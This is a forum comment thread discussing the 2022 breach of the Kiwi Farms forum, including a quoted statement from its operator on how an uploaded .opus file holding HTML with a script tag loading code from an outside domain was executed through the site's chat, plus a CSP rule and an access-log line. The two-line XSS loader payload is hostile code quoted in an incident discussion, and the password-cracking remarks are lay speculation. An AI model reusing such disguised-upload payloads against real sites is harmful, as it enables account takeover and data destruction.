Kiwi Farms lives on the clear net again!

submitted by [deleted] from i.imgur.com

sorted by:
top
newinsightfulfun
you are viewing a single comment's thread.

view the rest of the comments →

[–][deleted]  (6 children)

[deleted]

    [–][deleted] 1 insightful - 2 fun1 insightful - 1 fun2 insightful - 2 fun -  (5 children)

    I don't recall reading anything about the password situation besides he didn't think they'd been compromised but it was best to be safe rather than sorry. Apparently the forum software Xenforo does salt and hash passwords, but I've read a technique called rainbow tables can be used to glean the password anyways.

    Or he might have modified the code, or it was an obsolete version. Apparently their license for that software has not been renewed for some time because of the content of the site and things are out of date.

    [–][deleted] 2 insightful - 2 fun2 insightful - 1 fun3 insightful - 2 fun -  (4 children)

    Apparently the forum software Xenforo does salt and hash passwords, but I've read a technique called rainbow tables can be used to glean the password anyways.

    Rainbow table attacks can break 1-way hashing alone, but salting should prevent this

    [–][deleted] 1 insightful - 2 fun1 insightful - 1 fun2 insightful - 2 fun -  (3 children)

    Interesting. The attacker was able to gain admin access and had free roam of the system for a bit, I imagine this means the salt was comprised and then the rainbow table attack could still work, just take a bit longer.

    The site was compromised through his custom chat code, made me think of you actually. The attacker was able to upload a .. fuck, forgot the extension but some audio format file I think (. opus?), And xenforo doesn't verify data. It wasn't audio but a script and somehow it was able to be executed even though it shouldn't have had the permissions. I can look for the Telegram message if you're interested. That got them admin, they tried to get the user data, but it was too big and crashed the system (lol), so instead they just deleted everything.

    [–][deleted] 2 insightful - 2 fun2 insightful - 1 fun3 insightful - 2 fun -  (2 children)

    Deleted everything? damn I hope they had backups. Yeah definitely curious as to what exactly happened here if you come across the info

    [–][deleted] 2 insightful - 2 fun2 insightful - 1 fun3 insightful - 2 fun -  (1 child)

    It was all backed up. This is from the Telegram: (link)

    The issue was a script injection. I am working on the details. Here is my challenge to any hackers or aspiring hackers.

    There is a file called troonshine.opus, with the contents of this:
    <!DOCTYPE html>
    <script src=//poz.hiv/load.js></script>

    The web document, on the same domain, has a CORS rule that looks like this:
    <meta http-equiv="Content-Security-Policy" content="script-src 'self' 'nonce-0113ffa9cf5af884e070dd1e36188e5db5ba4bbdacaef1c21a733cea089a7fce'" />

    What could you possibly put into that document to get it to load the .opus and have the script execute?

    The more finer details are this: XenForo does not validate any file contents. You can write an .opus file that is basically just an HTML document loading a script off-site and if you somehow open it, it does run. I have confirmed this.

    The question is of how it got injected. The chat on Kiwi Farms was a Rust websocket chat that was part of a forum rewrite I had been working on. Relevant source:
    https://github.com/jaw-sh/ruforo/blob/master/src/bin/xf_chat/main.rs
    https://github.com/jaw-sh/ruforo/blob/master/resources/js/chat.js
    https://github.com/jaw-sh/ruforo/tree/master/src/bbcode

    What baffles me is that even if we did theoretically pass the client a message that was simply instruction to load another script, it should not work, because the security policy of the chat explicitly says that no scripts should run — EVEN FROM THE SAME DOMAIN — unless they are given a nonce token. I know it happened in the chat, though, because I found the access.log entry where it gets opened:
    x.x.x.x - - [18/Sep/2022:03:03:53 -0400] "GET /data/audio/3696/3696202-c63cc36fd4acb874fdebd0b3988c3410.opus HTTP/1.1" 200 90 "https://kiwifarms.st/test-chat?style=dark" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"

    So what can be done to make an .opus media file load as an inline web document which can execute its own scripts that violate the CORS of the web document it's loaded into? I just don't understand.

    jcmoon@pm.me
    P.S. If you're going to write me and take credit for the attack, include the name of the random user you made an admin.

    Edit: I believe that the .opus file with the xss payload was injected via an iframe that was somehow added to chat. I don't know how they rendered an iframe but that would work.

    [–][deleted] 3 insightful - 2 fun3 insightful - 1 fun4 insightful - 2 fun -  (0 children)

    The chat on Kiwi Farms was a Rust websocket chat that was part of a forum rewrite I had been working on

    Yikes, lol, I see why this reminded you of me. Hacking his rusty forum and chat hits a little close to home

    So the good news is it doesn't sound like a rainbow table attack was able to break hashed and salted passwords. That would be catastrophic for secuirty. An XSS attack is a more sensible attack vector for something like this. I am no hacker or security expert, but if there was a problem with his code, or even an underlying library that could be exploited, it would explain this. In the server I'm working on, I use the actix-cors library and if anyone can exploit that library i'd be boned, my code depends on all those library implemenatations being correct even if I do everything right on my end